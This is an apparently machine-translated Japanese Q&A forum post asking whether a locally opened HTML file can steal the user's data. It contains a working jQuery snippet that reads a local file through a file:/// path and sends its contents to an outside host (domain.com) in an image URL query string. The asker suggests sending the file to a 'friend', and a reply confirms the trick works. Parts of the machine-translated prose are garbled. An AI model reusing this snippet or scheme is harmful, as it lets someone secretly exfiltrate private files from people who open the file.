11
セキュリティについて説明しましょう。理論的には、ユーザーがhtmlファイルを開いて(ネットワークではなくファイルシステムから開くと)、スクリプトのあるファイルシステムから情報を得ることができます。コードを見てください:は、htmlファイルを実行してユーザーのデータを盗みます。
INFO.TXT:
my info
のindex.html:
<!doctype html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.8.1/jquery.min.js"></script>
<script>
$(document).ready(function() {
$.get('file:///home/daz/desktop/info.txt', function (data) {
$('<img>').attr('src', 'http://domain.com?data=' + escape(data)).appendTo('body');
}, 'text');
});
</script>
</head>
<body></body>
</html>
一部たブラウザ(例えばFirefoxの、)あなたはfile://からファイルを取得することができますXmlHttpRequestを介して、私はファイルへのパスを推測するなら、私はそれがAJAXのコンテンツを取得することができます。そして、imgタグをsrcと追加して、クエリ文字列のパラメータを持つドメインに追加することができます。そしてブラウザは素直に要求をしますGET ?data=my%20info%0A domain.com。サーバー側では、クエリ文字列を解析してデータを取得できます。私は右の私はこれを行うことができます
アム?彼が自分のhtmlファイルを開くと、自分のコンピュータからユーザーのデータを取得できますか?だから私はちょうど言うことができます: "ねえ、お友達、このファイルをチェック!(2台の制限付き:ユーザーがFirefoxや同様の構成で何か他のものを使用する必要があり、私は、ユーザーがためのアクセス権をアクセスすることができないファイルを取得することはできません)。
更新日:
を、それが可能であるならば、なぜそれが可能ですか?なぜ彼らはあなたにそのようなことをさせるのですか?なぜダイアログが表示されないのか。
2を更新:
誰かがこの問題についてのレビューを作ればそれは素晴らしいことだろう。前もって感謝します!
私は分かりません。 :) – gengkev
はい、これは完全に可能です。 – Brad